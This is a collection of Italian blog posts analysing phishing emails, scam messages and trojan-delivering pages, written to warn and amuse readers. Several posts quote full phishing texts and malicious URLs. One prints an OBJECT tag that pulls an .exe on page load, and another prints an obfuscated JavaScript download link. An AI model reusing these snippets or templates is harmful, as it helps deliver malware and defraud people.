Anna mi ha appena passato un minaccioso messaggio che le era arrivato per email. Il testo è il seguente:
Subject: Avviso di insoluto su Fattura

Gentile Cliente,
Da un nostro controllo contabile non ci risulta a tutt'oggi il pagamento della fattura P.N. 335624-1 dell'importo di Euro 4.329,50.
Se la fattura risulta gia saldata o se ritiene possa sussistere un errore cotabile la invito a prendere visione del conto da pagare attraverso il nostro:
www.avvocati-ass.com/Fatturazione_CEF/FTR-335624.html ( clicca per collegarti )
In difetto, provvederò ad agire nelle sedi opportune, senza ulteriore preavviso.

Distinti saluti.
Dott.Avv. Giancarlo Gentiloni

I miei affezionati lettori avranno immediatamente notato i due errori di grammatica ("gia saldata" ed "errore cotabile") e avranno capito che si tratta di un phishing. In effetti, cliccando sul link, esce una pagina dal titolo intimidente ATTO DI DIFFIDA E MESSA IN MORA e l'immagine di una pagina rimpicciolita in modo che non possa leggerla. Se avete un PC windows, non provate a cliccare né sulla pagina né sulla scritta "ingrandisci", visto che verrebbe immediatamente scaricato un file .exe che non voglio affatto sapere cosa faccia.
Inoltre, guardando il sorgente di quella pagina, c'è anche il codice seguente: <OBJECT CLASSID="CLSID:F16FEB0E-2A86-4228-AFF1-E7500263A51F" CODEBASE="Fatt56563A.exe" width="1" height="1"></OBJECT> che potrebbe dare dei guai anche senza cliccare su quelle immagini, solo aprendo la pagina di cui sopra. Non dite che non vi ho avvertiti!

ps: se uno va a fare un controllo whois sul nome a dominio avvocati-ass.com, scopre che è stato registrato attraverso una società californiana che nasconde il nome del gestore vero e proprio, e soprattutto scopre che è stato registrato sabato pomeriggio scorso: Creation date: 19 Jan 2008 14:27:36. Se poi si vuole divertire, può andare alla pagina di informazioni, dove scopre - ma non c'è nulla di strano - che il sito è cinese... Il curiosone può anche andare all'indirizzo IP corrispondente e vedere un po' di ideogrammi che Babelfish mi traduce più o meno come "il tuo sito non è stato ben configurato". Ma forse quando voi leggerete questa mia notiziola, l'IP sarà cambiato: il sito infatti dice che il client può salvare l'indirizzo per non più di tre minuti (il default è da uno a tre giorni :-) )

Aggiornamento: (h 21:50) A quanto pare, questa notiziola mi ha fatto raggiungere nuove vette di contatti, più che i miei pipponi con Ratzi della scorsa settimana. D'altra parte, in questo momento non solo una ricerca per "avvocati-ass.com" riporta il mio blog al primo posto (fregando altri che ne avevano parlato prima di me...), ma non ci sono occorrenze al di fuori del circuito dei blog e dei forum. Quindi nulla dai grandi quotidiani online, ma soprattutto nulla dalle società che si fanno pagare per le loro "soluzioni di sicurezza". Magari poi i loro prodotti bloccano il troiano, ma per molta gente loro sono la Fonte di Tranquillità, e un avvisino sul loro portale sarebbe stato utile. O no?

Ero rimasto fermo ai tentativi di sfruttare eBay per il phishing scrivendo una mail incazzata perché il tipo non aveva ancora ricevuto un oggetto che noi avremmo venduto all'asta. Mattia mi ha appena segnalato una variante ancora più "simpatica".
Il messaggio, nel solito pseudoitaliano, è il seguente:
Salve, vorrei acquistare il navigatore elettronico che avete per la vendita
su eBay qui http;//cgi.ebay.it/ws/eBayISAPI.dll?ViewItem=3D879275541249
Esso è di nuovo? E la prego di dirmi quanto è la tassa di consegna a Trieste.
Grazie,
Luca

A parte il punto e virgola al posto dei due punti nell'URL, il vero link nascosto naturalmente non è ad eBay (anche perché non ci si riuscirebbe ad arrivare direttamente) ma al sito del phisher, http://kisheri.front.ru/sez/ che presenta una bella pagina di autenticazione della società d'aste. La parte più interessante è che ho provato a mettere username e password, e sono effettivamente arrivato a una pagina di eBay con l'asta per uno schermo per navigatore! Chissà se l'annuncio è stato scelto a caso (penso di sì)...

(ovviamente ho inserito come username e password delle stringhe casuali)

Diventa sempre più difficile trovare esempi interessanti di phishing. Sembra che la fantasia degli spammatori stia esaurendosi, non tanto arrivando a un testo che potrebbe essere preso per buono, ma fossilizzandosi su uno pseudoitaliano ritenuto probabilmente sufficiente.
Però stamattina su una delle mie caselle tin.it mi è arrivato un avviso dell'Akbank che probabilmente mi chiede di garantire che sono effettivamente io. Ecco il testo:
Güvenlik Alarmi
AKBANK Online Bankacılık hesabınızın hizmet süresi dolmak üzeredir.
Aşağıdaki linki kullanarak hesabınıza ulaşabilir ve hesabınızı tekrar aktif hale getirebilirsiniz.
È scritto in turco, proprio così: la Akbank è in effetti una banca online turca. Sempre per la globalizzazione imperante, il sito a cui punta il falso link è palestinese ( http://alamiah.ps/secure/33.swf/www.akbank.com/efs/servlet/military/?url_activation=true), che a sua volta manderebbe a uno dei tanti siti americani di hosting, Onlinehorizons, che non è gratuito ma forse ha il vantaggio di avere una versione in arabo. Visto quante cose si imparano con l'internette?

Come nascondere un troiano in questi giorni? ovviamente in un messaggio di auguri. Quindi nelle mie caselle postali tin mi sono ritrovato un po' di auguri non esattamente sinceri.
Nel primo caso, a dire il vero, «eCard.scr era infetto con il virus Trojan.Pandex ed e' stato cancellato perche' il file non poteva essere pulito.», quindi mi sono semplicemente scompisciato leggendo il testo degli auguri:

Ciao, uomo!Jane Invia ti eCard con salutiControlla il tuo attaccamento ;) Buon Natale!Cordiali saluti.

Sì, gli spazi non c'erano proprio.
Il secondo caso è invece più interessante. C'è la caduta di stile di usare come mittente mod-submit@bear.com che fa tanto Apache; però l'oggetto ("New Year wishes for you") e il testo ("As you embrace another New 2008 Year (a capo) http://newyearwithlove.com/"> non erano male.
Non so esattamente cosa faccia Mario con il suo DNS, ma è interessante, perché non è possibile contattare il sito, visto che viene trasformato in 1.0.0.0. Per i curiosi, il vero indirizzo è 74.66.92.4 dove risponde un server russo (nginx, meglio noto per essere quello su cui gira YouPorn) che invia questo testo:

Your download should begin shortly. If your download does not start in approximately 15 seconds,
you can <!-- a href="fck2008.exe" !--><script language="javascript"><!-- a href="fck2009.exe" -->document.write( unescape( %3C%61%20%68%72%65%66%3D%22%68%61%70 %70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E' ) );</script>click here</a> to launch the download and then press Run. Enjoy!

Tu, stupidottero, clicchi su questo file happynewyear2008.exe, e non so che cosa ti becchi. D'altra parte, la mamma non ti ha insegnato di non cliccare mai su un eseguibile sconosciuto?

Mi è appena arrivata una mail da tale "giannibienti@libero.it" (nessuna occorrenza su google, ma c'è un "giannibienti@inwind.it") con questo titolo e il testo seguente:
Buongiorno,

l’Ufficio Studi e Ricerche di Castorama Italia sta conducendo un’indagine sul Natale.

Il questionario durerà solo pochi minuti.

La Sua preziosa collaborazione sarà per noi molto utile per migliorare i nostri servizi.

Per accedere al sondaggio e esprimere le sue opinioni clicchi sul Link sotto
riportato:
http://www.surveymonkey.com/s.aspx?sm=5ezAvry9QPToc5k58qpE9A_3d_3d

Se dovesse incontrare dei problemi di accesso al sito, per favore provi a copiare
e incollare il link nella riga dell'indirizzo del suo web browser/programma di navigazione in rete. Per favore si assicuri che sia su una sola linea e senza
spazi.

La preghiamo di compilare il sondaggio al piu' presto possibile entro qualche
giorno.

Le sue risposte saranno trattate in modo anonimo e in accordo con
la legge sulla privacy.

Cordiali saluti,

Ufficio Studi e Ricerche
CASTORAMA ITALIA

Segue la solita palla sulla privacy (palla nel senso che non ci crede nessuno) e un link per l'opt-out,
http://www.surveymonkey.com/optout.aspx?sm=5ezAvry9QPToc5k58qpE9A_3d_3d.

Ora, surveymonkey.com è sì un sito che almeno così ad occhio permette appunto di fare sondaggi e io sarò paranoico, ma non è che la cosa mi piaccia più di tanto, soprattutto perché ha una quantità di JavaScript assolutamente eccessiva, così come troppi campi hidden nel form. Aggiungiamo poi che non c'è nessun link a Castorama né si trova in rete il fantomatico "Ufficio Studi e Ricerche": il risultato finale è che nella migliore delle ipotesi questo è uno spam senza se e senza ma, e nella peggiore un bel troiano. Guardate voi se anche sotto Natale bisogna rovinarsi così.

Nota: se non capite cosa sto scrivendo, non preoccupatevi. È così tecnico che non lo capisco nemmeno io: potete tranquillamente saltare questa notiziola.
Come molti spammer sanno, uno dei sistemi migliori per inserire un troiano in un sistema è fare una richiesta che abbia come referrer il troiano stesso, e aspettare che l'ignaro utente guardi le sue statistiche e si chieda chi è quel tipo che viene a visitarlo.
In questo momento il mio sito - ma anche altri ospitati dal mio provider - vede un paio di dozzine di referrer da http://tvsetmp3.com, tutte provenienti da 87.118.120.23. Se uno prova a cliccare sul sito, viene rediretto a http://ismymovies.com/movie/black/0/2/812/0/ (che per curiosità vostra è ospitato sul server thmnetw2.ru... cominciate a subodorare qualcosa?). Questo link vuole che tu accetti un'estensione ActiveX, dicendoti "Your browser cannot display this video file. You need to download new version of Video ActiveX Object to play this video file". Se provi a dire di no ti riappare immediatamente la finestra di richiesta 'Download video codec to view media files.', in pratica bloccando Firefox. Non so cosa succeda con IE, e non intendo provarci :-)
Però a questo punto mi chiedo cosa ci sia dietro. La pagina è tutta in javascript, ma non sono in grado di verificare cosa c'è. Qualche esperto mi dà una mano?

Io capisco che scrivere del phishing in italiano non è molto facile. Però mi chiedo perché i sedicenti "Mr. De Luca Lombardi" e "Mr. Greco Colombo" - sì, ciascuno di loro ha due cognomi e nessun nome... e il secondo sembra preso di peso dalle cronache di Tangentopoli - che mi hanno comunicato a un indirizzo .it che la Fondazione Di Vittorio, pardon, la "Fondazion Di Vittorio, ITALY" mi abbia scelto come "one of the final recipients of a Cash Grant/Donation for your own personal, education and business development"... il tutto in inglese. Tra l'altro, la "Fondazion" è stata "established 1977 by the Multi-Million groups": immagino Agnelli e Romiti :-) Buffo notare la mancanza di "in" prima di "1977", un tipico germanismo che fa il paio con l'indirizzo di Mr. Greco che è executive_secretary_greco@yahoo.de. Naturalmente, essendo questa una truffa di tipo 419, l'indirizzo IP da cui il messaggio è stato spedito (213.185.118.236) è... nigeriano!
In una notizia scorrelata, il mittente di un altro spam odierno è zweifel@vt.edu, e zweifel in tedesco significa dubbio: insomma, un mittente autoreferenziale!

Tra ieri e oggi la mia vecchia casella di posta tin ha ricevuto 26 messaggi. Di questi, uno era di una vecchierrima lista (capita una volta al mese o giù di lì che qualcuno mi contatti ancora là), quindici di phishing - a parte Poste Italiane, in questo periodo è Banca di Roma che è molto apprezzata, e solamente nove di spam vero e proprio. Anche la casella gmail sembra al momento ricevere più posta voluta di quella non voluta.
Mi chiedo che cosa stia succedendo.

A quanto sembra, in questi giorni i phisher si sono spostati dalle Poste Italiane a CartaSì. Devo però dire che c'è anche stato un salto di qualità. Ecco il testo di cosa mi è arrivato oggi, e che poi puntava a http://www.abetco.com/users/mark/cartasi/ via un sito taiwanese.
---------------------
Stop alle frodi su Internet!

> Perché, allora, attivare una protezione contro le frodi on-line?
Perché il nostro numero di Carta può essere trafugato nel mondo reale (ad esempio, da ricevute di pagamento gettate via in modo incauto) e usato per pagamenti su Internet a nostra insaputa!

Tutti, quindi, siamo potenziali vittime delle frodi on-line: sia che usiamo la nostra Carta per acquisti su Internet, sia che non lo facciamo.

E’ vero che CartaSi tutela sempre i suoi Titolari: in caso di addebiti non riconosciuti si può infatti contestare e ricevere il rimborso.

> Ma perché rischiare di ricevere addebiti indesiderati quando è possibile prevenirli?

Lo puoi fare subito dal sito CartaSi:
una garanzia di sicurezza per te, uno stop alle truffe on-line!
---------------------
Come potete notare, l'italiano è perfetto. Mi posso al limite lamentare che abbiano scritto "E'" invece che "È", ma quello lo fanno tutti coloro che hanno una tastiera italiana :-)
Insomma, si direbbe che il lucroso mercato del phishing sta tornando nelle mani nostrane. Non siete felici?

In una delle mie caselle di mail che non uso mai, ho trovato un messaggio inviato da me a uno che non conosco, con testo "Ciao, vorrei condividere un link Google Maps con te" e un link che in effetti è una mappa di Google Maps di un qualche posto sull'appennino tosco-emiliano, ma senza nessun altro link.
Qualcuno ha mai ricevuto qualcosa di simile? È davvero spam?

Beh, non solo di oggi: ne ho uno del 26 luglio scorso
In pratica, ti arriva una email con un improbabile mittente (l'ultimo è gentilescapigi <gentilescapigi@yahoo.it>, ma il primo è stato dottorino <dottorinotrespighi@yahoo.it> che almeno era un nome divertente) che afferma di avere appena completato la sua iscrizione e ti invita a fare lo stesso. Credo che questi di tetigi.com (perché poi casualmente questi messaggi arrivano tutti di là) pensino di fare "marketing virale", la traduzione in marchettaro di Puro Spam.
Mi verrebbe quasi voglia di iscrivermi davvero usando un anonimizzatore, mettere un po' di materiale pedopornografico o mastelliano, e poi avvisare l'Escopost per far chiudere il sito...

Ricordate la storia del Norton Antivirus sul PC di Anna? Beh, visto che il pc era sempre in uno stato pietoso, ieri ho pensato bene di fare una pulizia completa, formattare tutto il disco e ripartire da capo. Ieri sera ho così fatto una faticaccia per infilare tutti i suoi dati in un hard disk esterno, e oggi l'ho lasciato girare un po' per riuscire a scaricare il metaaggiornamento di Windows Update e i 79 aggiornamenti necessari - e fortuna che era già un XP Service Pack 2.
Peccato che fatte tutte queste operazioni... mi sono trovato l'antivirus installato. Beh, non proprio l'antivirus, ma tutta una serie di roba della Symantec che ovviamente non avevo mai nemmeno pensato di aggiungere. Ma la cosa peggiore è che se da pannello di controllo lanciavo il programma per la rimozione del software, non trova nulla!
Fortuna che esiste Spybot, che mi ha fatto trovare, ben nascosto sotto cinque o sei directory dal nome improbabile, quale fosse il comando da lanciare. Forse stavolta andrà meglio :-)

Tor, come dice la pagina ufficiale - in italiano, per giunta - è "una rete di tunnel virtuali che permette a persone e gruppi di aumentare la privacy e la sicurezza in Internet". Detto in parole povere, se tu ti connetti via Tor non dovrebbe essere possibile rintracciarti, perché i pacchetti dati vengono suddivisi e sballottati su e giù per la Rete.
Oggi, nella cartella dello spam, c'era un messaggio di un improbabile "foreverlast@interfacefinancial.biz" che mi avvisava - in inglese - che la mia vita online non ha privacy, scrivendo "Everyone who is trading files is being traced. The RIAA is suing one person after another. Your privacy can be safe again with our new technology. This free download will keep you safe from those who are watching you." Da qui un bel puntatore al sito http://201.255.111.44/, manco hanno avuto voglia di prendersi un bel nome a dominio questi argentini, da cui potresti scaricarti un bel tor.exe.
Devo dire che mai come in questo caso la definizione di Trojan si attaglia perfettamente.

Non ho ancora capito se twitter serve a qualcosa oppure no. Visto che la notte ci dormo ancora bene, la cosa non mi preoccupa: mi limito ogni tanto - diciamola tutta: quando mi viene in mente - a mandare un messaggio via gtalk scrivendo che cosa sto facendo, e non guardo cosa stanno facendo gli altri.
Però mi arriva ogni tanto un messaggio di twitter che mi dice che "qualcuno mi sta seguendo": è un suo diritto, ma quando stamattina ho scoperto che il mio nuovo "seguace" è Choose the Financial news from facebook with XXX ho iniziato a capire che il mio seguito è molto minore di quanto credessi :-)
Non che cambi molto: continuerò ad aggiornare twitter se mi viene in mente di farlo, e manderò gli annunci di nuovi seguaci direttamente in spambox. In genere è il porno, quello che tira fuori il massimo da una qualunque applicazione; ma si vede che i 140 caratteri per messaggio erano un po' pochi, e quindi c'è solo il second best!

Credo che il phishing arrivatomi stamattina raggiunga vette inarrivate nella definizione di una nuova lingua quasi totalmente dissimile all'italiano. Il titolo è promettente: «Questo email deve informarlo che, quello abbiamo dovuto ostruire il vostro accesso di cliente di PayPal Inc.», e già mi vedo i blocchi di cemento per impedire l'accesso a via PayPal. Il «Caro PayPal Inc. utente, » iniziale è una chiara citazione di Asterix e i Britanni, e mi sarei aspettato di trovare una magico pozione. Però non riesco esattamente a capire «perchi abbiamo dovuto aggiornare i nostri assistenti per rimuovere la frode in linea.». O meglio: "perchi" è un perché con il bit alto tagliato, ma gli "assistenti"? Il tutto condito dallo «scattisi qui», che sarebbe appunto il "clicca qui".
Capisco che il costo nel passare su babelfish un messaggio sia più o meno nullo, ma «Francamente» (come da loro firma) mi chiedo se gli amici che fanno queste cose si rendono conto che nemmeno il più stupido utonto potrebbe cascarci... non foss'altro che perché non riesce a capire cosa ci sia scritto!

Perché limitarsi a fare phishing su un solo sistema? L'ultimo esempio che mi è arrivato ha lo slogan «Il più buon modo di comprare o vendere on-line su eBay sta usando PostePay», qualunque cosa ciò dovesse significare in italiano per gli amiconi che hanno scritto il messaggio. Altre chicche nel testo: «Ad attivo i servizi on-line e nuovi con eBay per favore completano il Suo Poste.it conto on-line» che è al di là della mia comprensione, e «L'Assistenza Clienti [...] immediatamente vuole attivo i Suoi servizi nuovi con eBay», che almeno è più chiaro.
D'altra parte, il sito del phishing, 125.70.253.8, è situato a Pechino...
Nota a lato: gli indirizzi IP stanno davvero per finire, se la classe A 125.x.x.x è già stata assegnata. Dopo di quella c'è solo la 126.x.x.x... (sì, lo so che le classi A sono allocate per continente e magari gli asiatici sono più avanti nel loro uso, ma il concetto non cambia) Ricordo ancora quando in Cselt non eravamo connessi via Internet ma solo con Decnet, e usavamo indirizzi IP interni 125.x.x.x "perché tanto non davano fastidio in ogni caso"!

Mentre davo una rapida occhiata al phishing che mi è arrivato oggi, mi è saltato all'occhio un avviso di "CartaSi". Devo dire che era anche scritto in un italiano corretto, per quanto si possa definire "corretta" una frase tipo «Le ricordiamo che ogni estratto conto rimane in linea fino al terzo mese successivo all'emissione».
La cosa interessante è che il sito phisher è http://psyu.ps/titolari.cartasi.it/portal/server.php: il dominio .ps, per chi non lo sapesse, corrisponde all'Autorità Nazionale Palestinese e a suo tempo è stato creato con mille difficoltà, perché l'Autorità Nazionale non è una nazione; la gabola usata per la creazione è "ah, ma noi non facciamo i domain nazionali guardando le nazioni, ma i codici ISO a due lettere - che forse corrispondono alle nazioni, ma per noi è irrilevante". La politica c'entra anche con Internet, insomma.
Ma la cosa ancora più interessante è un'altra. A giudicare dall'url, questo non è un sito che è stato bucato, ma uno che ha messo su apposta il tutto. D'altronde, la home page è tutta rossa, con titolo SITE DU PS HANNUT e un file flash che non vedo. Però, se uno va a chiedere alla Naming Authority palestinese lumi sul sito, gli viene risposto «The domain "PSYU.PS" has not been registered», anche se il suo indirizzo IP è 66.235.184.156. Un territorio, due nazioni, non si sa quanti siti.
(p.s.: chicca da un più banale phishing di BancaIntesa. La chiusa del messaggio era
«Francamente, Reparto Di Rassegna Di Conti Di Banca Intesa»)

Magari qualcuno si è accorto che dopo un po' la gente mangia la foglia, e quando si trova scritto che i suoi dati anagrafici sono da verificare butta via semplicemente la email. I phishers, sempre attenti all'evoluzione del mercato, sembra così che abbiano trovato un nuovo modo per intenerire le future vittime.
Titolo del messaggio ricevuto stamattina: Racolta fondi per i bambini dell'terzo mondo (sì, l'italiano lascia sempre a desiderare, ma questi poveri bambini dell'terzo mondo non è che possano andare a sciacquare i panni - che non hanno - in Arno!)
I signori (sedicenti di BancaIntesa, nel caso ve lo chiediate) mi chiedono "un contributo a suo piacere per sostenere l'associazione Onlus" (sì, "Onlus" sembrerebbe essere il nome dell'associazione). Però bisogna dire che qualcosa di vero potrebbe anche esserci in tutto questo: il sito dove casca il phishing è sohee.com.br :-)

Beh, innanzitutto complimenti a quelli di erbaghju.com per essersi fatti bucare da un phisher che è riuscito a non essere fermato dal filtro antispam di gmail. Le lettere accentate continuano a mancare, e i dati sono diventati data, ma non sottilizziamo.
Ma il bello è il titolo del messaggio: Oggetto: Comunicazione Nr. 0XD2.0X8D.0XDF.0X4B del 5 Giugno 2007 - Leggere con attenzione, con tutta questa serie di numeri esadecimali che può sembrare stupida, ma equivale esattamente all'indirizzo IP dove bisognerebbe "Confirmare Conto", vale a dire http://0XD2.0X8D.0XDF.0X4B/bancopostaonline.poste.it.
La cosa interessante, però, è questa riga di header:
Received-SPF: fail (google.com: domain of servizio7419@poste.it does not designate 82.213.36.74 as permitted sender)
Tradotto per i non informatici, gmail ha chiesto al server di poste.it se era normale che qualcuno inviasse un messaggio a nome di poste.it da quel computer, e la risposta è stata "manco per idea!". Il tutto mostra un ottimo lavoro sia da parte di google che di Poste Italiane... peccato che manchi ancora l'ultimo pezzettino, cioè che ti compaia un bell'avviso a tutto schermo "guarda che probabilmente c'è qualcosa che non va in questo messaggio". Ma chissà, magari ce la faranno prima o poi.

Viene quasi da fare pat pat sulla spalla al tipo che ha postato da cdma-mobile-dyn-BU-89-40-191-163.zappmobile.ro un messaggio da "B A N C 0 P 0 S T A<raffaele.golia-1985[@]poste.it>" dal titolo "N u o v o - M e s s a g g i o - UTKGTUWIIK" e testo
|M e s s a g g i o - d i - e r r o r e|
|La|vostra|sessione|ha|espirato, prego|inizio|attività|ancora.
(terminante con una riga ZNLZDIZUFOFOUIYPCTBWTSRKWGMTZSHMKSQIHV). Il tutto cercando di mandarti a un sito... dove si era dimenticato di attivare il supporto per le CGI).
O almeno potremmo regalargli il filmato della scena di Totò e Peppino che chiedono informazioni al vigile milanese.

Avevo appena scritto di un phishing dei poveri mirato a PosteItaliane, e nei commenti mestesso parlava del suo record personale di questi messaggi.
Bene: stamattina ho controllato la mia vecchia email, che ormai uso solo come honeypot (per chi non sapesse il termine, è il "vasetto di miele" per attirare spammatori) e ho visto che dei 110 messaggi arrivati nelle ultime 36 ore diciannove erano phishing da sedicenti italopostieri.
Per i curiosi, ecco la lista dei titoli:

Poste.it 18 Apr 4:03 Notizia
Servizio Poste Italiane 18 Apr 2:49 Richiesta urgente aggiornamento dati per...
servizio@poste.it 18 Apr 2:04 Posta.it Notizia
Membro di Poste 18 Apr 0:49 POSTE: CLIENTE DELL'AGGIORNAMENTO YOR!
Servizio Poste Italiane 18 Apr 0:42 Richiesta urgente aggiornamento dati per...
BP0L@poste.it 17 Apr 23:54 GranPremio Mondo BancoPosta
Poste.it 17 Apr 23:39 Notizia
Servizio Poste Italiane 17 Apr 21:54 Richiesta urgente aggiornamento dati per...
Poste.it 17 Apr 19:02 Nuovi servizi online di Poste.it sono di...
Poste Italiane 17 Apr 18:51 Servizio di Cliente
Servizio Poste Italiane 17 Apr 15:25 Richiesta urgente aggiornamento dati per...
Servizio Poste Italiane 17 Apr 14:41 Richiesta urgente aggiornamento dati per...
Poste Italiane S. p. A. 17 Apr 14:18 Premiamo la tua fedeltà
BancoPoste Italiane 17 Apr 9:27 Caro poste italiane cliente
Posta Italiane 17 Apr 7:04 BancoPosta Online
Poste.it 17 Apr 4:35 Nuovi servizi online di Poste.it sono di...
Poste.it 16 Apr 20:43 Nuovi servizi online di Poste.it sono di...
Poste Italiane S. p. A. 16 Apr 20:11 Premiamo la tua fedeltà
servizio@poste.it 16 Apr 20:05 Posta.it Notizia Business

È vero che i numeri sono piccoli e statisticamente poco rilevanti: però più del 15% dello spam di questo periodo è su un singolo bersaglio, il che se ci pensate è qualcosa di assurdo. E non l'ho recuperato nemmeno tutto: mancano ad esempio le perle più burocratiche come Comunicazione nr. 91258 del 5 Aprile 2007...

A volte i phisher sono quasi patetici.
Non so se riuscite a vedere il carattere iniziale del titolo, che è una "i" russa (quella che assomiglia a una N allo specchio: и) Il signor "poste.it", anzi pstmt@hawaiiusafcu.com - anche lì, poveretto, poteva scegliersi un indirizzo un po' più serio tipo servizio@poste.it o sicurezza@poste.it - avrebbe voluto dire che "è necessario identificarsi": peccato che si sia dimenticato di cambiare charset e abbia lasciato quello cirillico, senza pensare che in italiano vengono usati caratteri ASCII oltre il 127...

L'ho già scritto che Poste Italiane al momento sono il maggior bersaglio italiano dei phisher. Devo però dire che il GranPremio Mondo BancoPosta per mau@tin.it non me lo sarei mai aspettato. (Il GranPremio esiste davvero, ho scoperto...)
Il testo è scritto in un italiano perfetto, anche se però, quando ci trascini il mouse su, scopri che gli "spazi" tra le parole sono in realtà cifre scritte in bianco su sfondo bianco (immagino per fare in modo che tutti i messaggi siano diversi e gli antispam bayesiani non vengano attivati). In fondo si trova anche una strana stringa esadecimale 6e2f065a2f24dafafc67485f6db54883 ripetuta più volte, sempre in bianco su bianco.
Anche se è abbastanza chiaro che la truffa è fatta da italiani, è buffo notare come il sito dove finisci quando clicchi è 210.70.176.222:82/icons/small/pos/.in/ , che corrisponde a un IP della Chang Jung Christian University, anche se così ad occhio il sito è stato craccato. Non so nemmeno se fare opera di carità cristiana e avvisarli :-)

Da molto tempo non ci arrivano più le buste paga cartacee, ma dobbiamo connetterci alla intranet per scaricare il cedolino in formato PDF. Per connettersi a quella sezione del sito, occorre digitare una seconda password, che per default è il codice fiscale. Essendo pigro, non l'avevo mai cambiata, ma dal mese scorso il cambio password è stato reso obbligatorio, e quindi ieri mi sono accorto che mi ero chiaramente dimenticato la password che avevo messo. Nessun problema: nella pagina c'è un tastino che permette di farsi resettare la password (al codice fiscale :-) ), tastino su cui ho subito cliccato.
In effetti, dieci minuti dopo, mi sono trovato quattro email: l'avviso che avevo fatto la richiesta, l'apertura del ticket, la sua chiusura... e una richiesta di compilare un survey. Va bene, dico io, andiamo sul sito. Clicco, e mi trovo una pagina di cortesia di Network Solution con su scritto "This Site Is Under Construction and Coming Soon." Rispondo alla email facendo notare la cosa, e mi torna un messaggio di errore "La casella postale del destinatario è piena". Cose che capitano.
Nel pomeriggio però il sito era finalmente funzionante, ma... Tutto Scritto Con Le Iniziali Di Ogni Parola In Maiuscolo! Avevo provato a copincollare un pezzo, ma le maiuscole sparivano; sono così andato a verificare più attentamente e ho scoperto che hanno usato un foglio di stile con l'istruzione text-transform: capitalize;, quindi Le Maiuscole Iniziali Sono State Una Loro Scelta Stilistica.
Non mi metto nemmeno a commentare la sintassi delle frasi: lascio solo un esempio. "Il tuo contributo è essenziale per migliorare il servizio offerto,
pertanto ti ringraziamo anticipatamente per aver dedicato attenzione a
questa Survey." Sì, forse avrei dovuto farle qualche coccola.
PS: Non è Telecom che gestisce tutto questo, visto che la cosa è stata appaltata ad HP DCS.